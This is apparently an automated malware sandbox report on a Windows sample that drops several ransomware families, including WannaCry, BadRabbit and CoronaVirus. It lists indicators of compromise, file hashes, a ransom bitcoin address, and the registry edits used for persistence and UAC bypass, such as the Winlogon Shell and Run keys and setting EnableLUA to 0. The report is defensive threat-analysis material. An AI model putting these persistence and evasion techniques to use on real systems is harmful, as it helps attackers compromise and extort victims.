Analysis
-
max time kernel
459s -
max time network
487s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2025, 16:36
Behavioral task
behavioral1
Sample
2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe
-
Size
4.2MB
-
MD5
56c9b50e8936c2516fb1e809d9989912
-
SHA1
0fcfa3e92f55200e884c718652ffee7f4ed013e8
-
SHA256
f14034d2f0c5b5485ef0d868db57bc24b83793681fe7d28e5e89e6b1c3bb0abb
-
SHA512
5ce6e2288497561d9bd01ce851588d94b25a0b6441973e7c3ab0cb73fae86567702ae091aaca8c32774aae10b23f66ce3730f26c8cb0a662e57f0759900bf31e
-
SSDEEP
49152:ieutLO9rb/TrvO90dL3BmAFd4A64nsfJJ2TIA5GNP1Jr4u/TgAPNdi9128qk1q4A:ieF+iIAEl1JPz212IhzL+Bzz3dw/VC
Malware Config
Extracted
C:\Users\Admin\Downloads\!Please Read Me!.txt
wannacry
15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1
Signatures
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Badrabbit family
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Gofing
Gofing is a ransomware written in Golang using Velocity Polymorphic Compression (VPC) obfuscation.
-
Gofing family
-
Gofing is a ransomware written in Golang using Velocity Polymorphic Compression (VPC) obfuscation. 62 IoCs
resource yara_rule behavioral1/files/0x0003000000022a56-4.dat family_gofing behavioral1/files/0x0002000000021642-2265.dat family_gofing behavioral1/files/0x0002000000023351-3931.dat family_gofing behavioral1/files/0x000200000001e54f-3934.dat family_gofing behavioral1/files/0x000700000001e6bb-3935.dat family_gofing behavioral1/files/0x0003000000022a54-3936.dat family_gofing behavioral1/files/0x0003000000022a55-3937.dat family_gofing behavioral1/files/0x0003000000022a57-3939.dat family_gofing behavioral1/files/0x0003000000022a59-3941.dat family_gofing behavioral1/files/0x000400000001e6bd-3944.dat family_gofing behavioral1/files/0x000400000001e6c3-3946.dat family_gofing behavioral1/files/0x000400000001e6cb-3948.dat family_gofing behavioral1/files/0x000400000001e6d0-3951.dat family_gofing behavioral1/files/0x000500000001e6e4-3954.dat family_gofing behavioral1/files/0x001600000001ed39-3960.dat family_gofing behavioral1/files/0x00040000000218c5-3965.dat family_gofing behavioral1/files/0x00030000000229dc-3971.dat family_gofing behavioral1/files/0x00030000000229f4-3976.dat family_gofing behavioral1/files/0x0003000000022a14-3981.dat family_gofing behavioral1/files/0x0003000000022a1c-3989.dat family_gofing behavioral1/files/0x0003000000022a20-3993.dat family_gofing behavioral1/files/0x0003000000022a1f-3992.dat family_gofing behavioral1/files/0x0003000000022a1e-3991.dat family_gofing behavioral1/files/0x0003000000022a1d-3990.dat family_gofing behavioral1/files/0x0003000000022a1b-3988.dat family_gofing behavioral1/files/0x0003000000022a1a-3987.dat family_gofing behavioral1/files/0x000d000000022a19-3986.dat family_gofing behavioral1/files/0x0003000000022a18-3985.dat family_gofing behavioral1/files/0x0003000000022a17-3984.dat family_gofing behavioral1/files/0x0003000000022a16-3983.dat family_gofing behavioral1/files/0x0003000000022a15-3982.dat family_gofing behavioral1/files/0x0003000000022a13-3980.dat family_gofing behavioral1/files/0x0009000000022a12-3979.dat family_gofing behavioral1/files/0x0003000000022a11-3978.dat family_gofing behavioral1/files/0x00030000000229f7-3977.dat family_gofing behavioral1/files/0x00030000000229f3-3975.dat family_gofing behavioral1/files/0x000f0000000229f1-3974.dat family_gofing behavioral1/files/0x00030000000229eb-3973.dat family_gofing behavioral1/files/0x00030000000229ea-3972.dat family_gofing behavioral1/files/0x00080000000229db-3970.dat family_gofing behavioral1/files/0x00040000000227d3-3969.dat family_gofing behavioral1/files/0x00050000000227d2-3968.dat family_gofing behavioral1/files/0x00050000000227d1-3967.dat family_gofing behavioral1/files/0x0007000000021e99-3966.dat family_gofing behavioral1/files/0x00040000000218b6-3964.dat family_gofing behavioral1/files/0x00040000000218b5-3963.dat family_gofing behavioral1/files/0x00040000000218a4-3962.dat family_gofing behavioral1/files/0x00050000000218a1-3961.dat family_gofing behavioral1/files/0x000300000001e6ed-3959.dat family_gofing behavioral1/files/0x000500000001e6eb-3958.dat family_gofing behavioral1/files/0x000500000001e6ea-3957.dat family_gofing behavioral1/files/0x000500000001e6e9-3956.dat family_gofing behavioral1/files/0x000500000001e6e8-3955.dat family_gofing behavioral1/files/0x000400000001e6d3-3953.dat family_gofing behavioral1/files/0x000400000001e6d2-3952.dat family_gofing behavioral1/files/0x000400000001e6cf-3950.dat family_gofing behavioral1/files/0x000400000001e6cd-3949.dat family_gofing behavioral1/files/0x000400000001e6c7-3947.dat family_gofing behavioral1/files/0x000400000001e6c0-3945.dat family_gofing behavioral1/files/0x0003000000022a5b-3943.dat family_gofing behavioral1/files/0x0003000000022a5a-3942.dat family_gofing behavioral1/files/0x0003000000022a58-3940.dat family_gofing -
Modifies WinLogon for persistence 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Wannacry family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (133) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (5899) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 410 1132 7ev3n.exe 412 1132 7ev3n.exe 414 1132 7ev3n.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 15 IoCs
flow pid Process 446 2476 msedge.exe 349 2476 msedge.exe 408 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe 434 2476 msedge.exe -
Drops file in Drivers directory 22 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\es-ES\wfplwfs.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\it-IT\wfplwfs.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\afunix.sys chrome.exe File created C:\Windows\SysWOW64\drivers\de-DE\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\de-DE\ndiscap.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\de-DE\wfplwfs.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\gmreadme.txt chrome.exe File created C:\Windows\SysWOW64\drivers\it-IT\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\fr-FR\ndiscap.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\fr-FR\wfplwfs.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\gm.dls chrome.exe File created C:\Windows\SysWOW64\drivers\it-IT\ndiscap.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\ja-JP\ndiscap.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\ja-JP\wfplwfs.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\uk-UA\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\es-ES\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\es-ES\ndiscap.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\fr-FR\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\ja-JP\NdisImPlatform.sys.mui chrome.exe File created C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui chrome.exe -
Manipulates Digital Signatures 2 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
description ioc Process File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll chrome.exe File created C:\Windows\SysWOW64\wintrust.dll chrome.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation msedge.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB914.tmp WannaCry (4).exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB91B.tmp WannaCry (4).exe -
Executes dropped EXE 61 IoCs
pid Process 5900 chrome.exe 5180 $uckyLocker.exe 5436 $uckyLocker.exe 1940 $uckyLocker.exe 1132 7ev3n.exe 1516 7ev3n.exe 5800 7ev3n.exe 5844 system.exe 856 system.exe 1988 system.exe 5276 system.exe 3764 CoronaVirus.exe 3776 CoronaVirus.exe 4872 CoronaVirus.exe 3704 CoronaVirus.exe 4600 CoronaVirus.exe 1708 CoronaVirus.exe 4508 msedge.exe 5080 msedge.exe 2416 msedge.exe 1932 msedge.exe 292 msedge.exe 4688 msedge.exe 3660 BadRabbit.exe 6100 33F.tmp 5484 msedge.exe 3092 msedge.exe 5144 BadRabbit.exe 3164 msedge.exe 1176 msedge.exe 3660 msedge.exe 2904 msedge.exe 3004 msedge.exe 2864 msedge.exe 5476 msedge.exe 5908 msedge.exe 1492 msedge.exe 5304 msedge.exe 1476 msedge.exe 1768 msedge.exe 224 msedge.exe 5944 msedge.exe 1744 msedge.exe 4788 msedge.exe 1132 msedge.exe 5508 BadRabbit.exe 4248 WannaCry (4).exe 5080 WannaCry (4).exe 6036 !WannaDecryptor!.exe 2272 !WannaDecryptor!.exe 2356 !WannaDecryptor!.exe 5568 !WannaDecryptor!.exe 4732 msedge.exe 1568 msedge.exe 1976 msedge.exe 4376 satan.exe 1648 satan.exe 1892 geoq.exe 4532 geoq.exe 3100 geoq.exe 5240 geoq.exe -
Loads dropped DLL 64 IoCs
pid Process 2276 WINWORD.EXE 3524 Explorer.EXE 3524 Explorer.EXE 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 3524 Explorer.EXE 3524 Explorer.EXE 5080 msedge.exe 5080 msedge.exe 5080 msedge.exe 3524 Explorer.EXE 2416 msedge.exe 2416 msedge.exe 1932 msedge.exe 1932 msedge.exe 292 msedge.exe 292 msedge.exe 4688 msedge.exe 4688 msedge.exe 4688 msedge.exe 3556 rundll32.exe 5484 msedge.exe 3092 msedge.exe 3092 msedge.exe 5484 msedge.exe 5484 msedge.exe 5036 rundll32.exe 3164 msedge.exe 3164 msedge.exe 1176 msedge.exe 1176 msedge.exe 1176 msedge.exe 3660 msedge.exe 3660 msedge.exe 3004 msedge.exe 2864 msedge.exe 3004 msedge.exe 5476 msedge.exe 5908 msedge.exe 2864 msedge.exe 5908 msedge.exe 5476 msedge.exe 2904 msedge.exe 2904 msedge.exe 1492 msedge.exe 5304 msedge.exe 5304 msedge.exe 1492 msedge.exe 1476 msedge.exe 1476 msedge.exe 1476 msedge.exe 1768 msedge.exe 224 msedge.exe 1768 msedge.exe 224 msedge.exe 5944 msedge.exe 5944 msedge.exe 1744 msedge.exe 1744 msedge.exe 1744 msedge.exe 4788 msedge.exe 4788 msedge.exe 1132 msedge.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{DA740ACB-23D3-741B-5056-89006DF8340B} = "C:\\Users\\Admin\\AppData\\Roaming\\Abyzhy\\geoq.exe" Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry (4).exe\" /r" WannaCry (4).exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\manifest.json chrome.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-21-869607583-2483572573-2297019986-1000\desktop.ini msedge.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini chrome.exe File created C:\Users\Public\Desktop\desktop.ini chrome.exe File created C:\Users\Public\Pictures\desktop.ini chrome.exe File created C:\Windows\Downloaded Program Files\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini chrome.exe File created C:\Users\Admin\Music\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini chrome.exe File created C:\Program Files\desktop.ini chrome.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini chrome.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini chrome.exe File created C:\Users\Public\Documents\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini chrome.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-869607583-2483572573-2297019986-1000\desktop.ini CoronaVirus.exe File created C:\Program Files\desktop.ini 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini chrome.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini chrome.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini chrome.exe File created C:\Users\Public\AccountPictures\desktop.ini chrome.exe File created C:\Users\Public\Music\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini chrome.exe File created C:\Users\Admin\Desktop\desktop.ini chrome.exe File created C:\Users\Admin\Documents\desktop.ini chrome.exe File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini chrome.exe File created C:\Users\Admin\Pictures\desktop.ini chrome.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini chrome.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini chrome.exe File created C:\Users\Public\Libraries\desktop.ini chrome.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini chrome.exe File created C:\Users\Admin\3D Objects\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini chrome.exe File created C:\Users\Admin\Favorites\Links\desktop.ini chrome.exe File created C:\Users\Admin\Links\desktop.ini chrome.exe File created C:\Users\Admin\Saved Games\desktop.ini chrome.exe File created C:\Users\Public\Downloads\desktop.ini chrome.exe File created C:\Users\Public\desktop.ini chrome.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini chrome.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini chrome.exe File created C:\Users\Admin\Downloads\desktop.ini chrome.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini chrome.exe File created C:\Users\Admin\Contacts\desktop.ini chrome.exe File created C:\Users\Admin\Favorites\desktop.ini chrome.exe File created C:\Users\Admin\OneDrive\desktop.ini chrome.exe File created C:\Users\Admin\Videos\desktop.ini chrome.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini chrome.exe File created C:\$Recycle.Bin\S-1-5-21-869607583-2483572573-2297019986-1000\desktop.ini 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini chrome.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini chrome.exe File created C:\Users\Public\Videos\desktop.ini chrome.exe File created C:\Windows\Fonts\desktop.ini chrome.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
flow ioc 347 raw.githubusercontent.com 348 raw.githubusercontent.com 441 raw.githubusercontent.com 444 raw.githubusercontent.com 445 raw.githubusercontent.com 446 raw.githubusercontent.com 349 raw.githubusercontent.com 408 raw.githubusercontent.com 432 raw.githubusercontent.com 433 raw.githubusercontent.com 434 raw.githubusercontent.com 442 raw.githubusercontent.com 443 raw.githubusercontent.com -
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf chrome.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\de-DE\dot3gpui.dll.mui chrome.exe File created C:\Windows\SysWOW64\uk-UA\BWContextHandler.dll.mui chrome.exe File created C:\Windows\SysWOW64\MixedRealityRuntime.dll chrome.exe File created C:\Windows\SysWOW64\XpsPrint.dll chrome.exe File created C:\Windows\SysWOW64\cmstp.exe chrome.exe File created C:\Windows\SysWOW64\downlevel\api-ms-win-service-core-l1-1-1.dll chrome.exe File created C:\Windows\SysWOW64\usbceip.dll chrome.exe File created C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-IsolatedVm-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat chrome.exe File created C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Networking-Package~31bf3856ad364e35~amd64~~10.0.19041.264.cat chrome.exe File created C:\Windows\SysWOW64\HoloShellRuntime.dll chrome.exe File created C:\Windows\SysWOW64\InputMethod\CHS\ChsIFEComp.dll chrome.exe File created C:\Windows\SysWOW64\NOISE.DAT chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\MSFT_NetEventProvider.cdxml chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PrintManagement\MSFT_PrinterProperty.format.ps1xml chrome.exe File created C:\Windows\SysWOW64\msra.exe chrome.exe File created C:\Windows\SysWOW64\uk-UA\imapi.dll.mui chrome.exe File created C:\Windows\SysWOW64\pl-PL\windows.ui.xaml.dll.mui chrome.exe File created C:\Windows\SysWOW64\wbem\en-US\iscsiprf.mfl chrome.exe File created C:\Windows\SysWOW64\zh-CN\SyncRes.dll.mui chrome.exe File created C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-UX-UI-63-merged-Package~31bf3856ad364e35~amd64~fr-FR~10.0.19041.1.cat chrome.exe File created C:\Windows\SysWOW64\KBDLV1.DLL chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_LogResource\en-US\MSFT_LogResource.schema.mfl chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_PackageResource\uk-UA\MSFT_PackageResource.schema.mfl chrome.exe File created C:\Windows\SysWOW64\de-DE\wimgapi.dll.mui chrome.exe File created C:\Windows\SysWOW64\icsxml\ipcfg.xml chrome.exe File created C:\Windows\SysWOW64\en-US\licmgr10.dll.mui chrome.exe File created C:\Windows\SysWOW64\iscsiwmiv2.dll chrome.exe File created C:\Windows\SysWOW64\spp\tokens\skus\csvlk-pack\csvlk-pack-Volume-CSVLK-4-pl-rtm.xrm-ms chrome.exe File created C:\Windows\SysWOW64\en-US\hh.exe.mui chrome.exe File created C:\Windows\SysWOW64\ja-JP\DevDispItemProvider.dll.mui chrome.exe File created C:\Windows\SysWOW64\newdev.dll chrome.exe File created C:\Windows\SysWOW64\uk-UA\schedsvc.dll.mui chrome.exe File created C:\Windows\System32\AppVIntegration.dll chrome.exe File created C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Storage-VirtualDevice-FibreChannel-Package~31bf3856ad364e35~amd64~uk-UA~10.0.19041.1.cat chrome.exe File created C:\Windows\SysWOW64\en-US\authfwgp.dll.mui chrome.exe File created C:\Windows\SysWOW64\ja-JP\GamePanel.exe.mui chrome.exe File created C:\Windows\SysWOW64\remotesp.tsp chrome.exe File created C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-UX-UI-Client-merged-Package~31bf3856ad364e35~amd64~es-ES~10.0.19041.1.cat chrome.exe File created C:\Windows\SysWOW64\CIWmi.dll chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetworkTransition\MSFT_NetTeredoState.cdxml chrome.exe File created C:\Windows\SysWOW64\es-ES\UserDeviceRegistration.Ngc.dll.mui chrome.exe File created C:\Windows\SysWOW64\it-IT\gpedit.dll.mui chrome.exe File created C:\Windows\SysWOW64\wshext.dll chrome.exe File created C:\Windows\SysWOW64\AppXDeploymentClient.dll chrome.exe File created C:\Windows\SysWOW64\Configuration\BaseRegistration\es-ES\MSFT_MetaConfigurationExtensionClasses.Schema.mfl chrome.exe File created C:\Windows\SysWOW64\KBDINPUN.DLL chrome.exe File created C:\Windows\SysWOW64\Keywords\ti_dnn_en-US.table chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PrintManagement\MSFT_TcpIpPrinterPort_v1.0.cdxml chrome.exe File created C:\Windows\SysWOW64\it-IT\lpeula.rtf chrome.exe File created C:\Windows\SysWOW64\mrt100.dll chrome.exe File created C:\Windows\SysWOW64\IME\SHARED\res\padrs804.dll chrome.exe File created C:\Windows\SysWOW64\InstallShield\setupdir\001a\_setup.dll chrome.exe File created C:\Windows\SysWOW64\downlevel\api-ms-win-base-util-l1-1-0.dll chrome.exe File created C:\Windows\SysWOW64\en-US\MCCSEngineShared.dll.mui chrome.exe File created C:\Windows\SysWOW64\en-US\PackageStateRoaming.dll.mui chrome.exe File created C:\Windows\SysWOW64\es-ES\iologmsg.dll.mui chrome.exe File created C:\Windows\SysWOW64\tapiperf.dll chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\MSFT_DAClientExperienceConfiguration.types.ps1xml chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources\WindowsPackageCab\de-DE\WindowsPackageCab.Strings.psd1 chrome.exe File created C:\Windows\SysWOW64\downlevel\api-ms-win-crt-time-l1-1-0.dll chrome.exe File created C:\Windows\SysWOW64\fr-FR\winmsipc.dll.mui chrome.exe File created C:\Windows\SysWOW64\olepro32.dll chrome.exe File created C:\Windows\SysWOW64\remoteaudioendpoint.dll chrome.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\fr\Microsoft.Windows.Firewall.Commands.Resources.dll chrome.exe -
Sets desktop wallpaper using registry 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" !WannaDecryptor!.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4376 set thread context of 1648 4376 satan.exe 402 PID 1892 set thread context of 4532 1892 geoq.exe 406 PID 3100 set thread context of 5240 3100 geoq.exe 414 -
Drops file in Program Files directory 64 IoCs
